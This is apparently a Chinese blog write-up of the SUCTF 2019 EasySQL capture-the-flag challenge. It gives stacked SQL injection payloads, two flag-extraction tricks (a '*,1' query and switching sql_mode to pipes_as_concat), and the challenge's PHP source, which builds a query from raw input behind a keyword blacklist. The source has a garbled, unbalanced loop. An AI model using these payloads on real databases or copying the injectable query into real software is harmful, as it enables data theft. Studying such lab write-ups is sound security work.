SUCTF_2019 EasySQL

web wp BUUCTF
CTF
发布日期:   2021-03-01
更新日期:   2024-06-27
文章字数:   444
阅读时长:   2 分
阅读次数:  

[SUCTF 2019]EasySQL

打开源码得到

<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>

此处post传参,参数名query

query=11 %23
Array ( [0] => 11 )//回显点貌似只有一个

这道waf过滤了太多关键词了,又想到堆叠注入

query=1;show databases; %23
Array ( [0] => 1 ) Array ( [0] => ctf ) Array ( [0] => ctftraining ) Array ( [0] => information_schema ) Array ( [0] => mysql ) Array ( [0] => performance_schema ) Array ( [0] => test )
query=1;show tables; %23
Array ( [0] => 1 ) Array ( [0] => Flag )

猜测flag在Flag表里

$sql = "select ".$post['query']."||flag from Flag";
//不知道哪儿来的源码

这里就转为对||的处理

第一种直接用*查询全部

payload
query=*,1
//select *,1||flag from Flag  等效于select *,1 from Flag

第二种 使用set sql_mode=PIPES_AS_CONCAT;将||视为字符串的连接操作符而非或运算符。

payload
query=1;set sql_mode=pipes_as_concat;select 1// '||' 前面是真就会跳过后面
//select 1;set sql_mode=pipes_as_concat;select 1||flag from Flag
//1||flag合并成一个单位回显

题目源码

<?php
    session_start();

    include_once "config.php";

    $post = array();
    $get = array();
    global $MysqlLink;

    //GetPara();
    $MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
    if(!$MysqlLink){
        die("Mysql Connect Error!");
    }
    $selectDB = mysqli_select_db($MysqlLink,$dataName);
    if(!$selectDB){
        die("Choose Database Error!");
    }

    foreach ($_POST as $k=>$v){
        if(!empty($v)&&is_string($v)){
            $post[$k] = trim(addslashes($v));
        }
    }
    foreach ($_GET as $k=>$v){
        }
    }
    //die();
?>

<html>
<head>
</head>

<body>

<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>

<?php

    if(isset($post['query'])){
        $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
        //var_dump(preg_match("/{$BlackList}/is",$post['query']));
        if(preg_match("/{$BlackList}/is",$post['query'])){
            //echo $post['query'];
            die("Nonono.");
        }
        if(strlen($post['query'])>40){
            die("Too long.");
        }
        $sql = "select ".$post['query']."||flag from Flag";
        mysqli_multi_query($MysqlLink,$sql);
        do{
            if($res = mysqli_store_result($MysqlLink)){
                while($row = mysqli_fetch_row($res)){
                    print_r($row);
                }
            }
        }while(@mysqli_next_result($MysqlLink));

    }

?>
文章作者: 0xdadream
文章链接: https://0xdadream.github.io/2021/03/01/suctf-2019-easysql/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 0xdadream !
web wp BUUCTF
评论
  目录